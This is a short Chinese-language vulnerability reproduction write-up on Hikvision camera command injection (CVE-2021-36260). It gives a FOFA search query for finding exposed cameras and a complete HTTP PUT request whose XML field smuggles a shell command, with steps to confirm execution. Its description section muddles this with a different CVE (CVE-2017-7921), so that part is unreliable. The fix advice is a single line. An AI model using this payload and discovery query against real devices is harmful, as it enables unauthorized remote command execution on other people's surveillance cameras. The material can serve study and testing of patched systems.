【漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)

Nx01 产品简介

        Hikvision（海康威视）是一家在中国颇具影响力的安防公司，其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富，涵盖了各种型号和功能，以满足不同用户的需求。

Nx02 漏洞描述

        Hikvision摄像头产品的越权漏洞（CVE-2017-7921）是一种严重的安全问题，该漏洞允许未经授权的用户访问和控制系统。通过特定的路径访问Hikvision摄像头的某些功能，包括检索所有用户及其角色的列表、获取相机快照以及下载摄像头配置账号密码文件等。

Nx03 产品主页

fofa-query: app="HIKVISION-视频监控"

Nx04 漏洞复现

漏洞点位于/SDK/webLanguage 利用PUT方法上传xml数据：

PUT /SDK/webLanguage HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 80
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
 
<?xml version="1.0" encoding="UTF-8"?><language>$(ls -l > webLib/x)</language>

请求路径/x，查看命令是否执行成功。

Nx05 修复建议

建议联系软件厂商进行处理。